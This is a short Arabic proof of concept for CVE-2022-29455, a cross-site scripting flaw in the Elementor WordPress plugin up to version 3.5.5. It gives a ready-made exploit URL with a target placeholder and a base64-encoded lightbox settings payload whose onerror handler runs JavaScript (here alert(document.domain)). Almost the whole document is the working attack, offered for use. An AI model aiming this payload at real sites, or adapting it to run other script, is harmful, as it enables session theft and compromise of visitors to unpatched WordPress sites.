
إثبات مفهوم لاستغلال CVE-2022-29455، وهي ثغرة برمجة نصية عبر المواقع (XSS) في إضافة Elementor لـ WordPress (<=3.5.5) عبر عنوان URL مخصص لإجراء lightbox.
ثغرة في ووردبريس - XSS (Cross-Site Scripting)
https://add your target here/wp-content/plugins/elementor/assets/js/frontend.min.js
https://add your target here/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=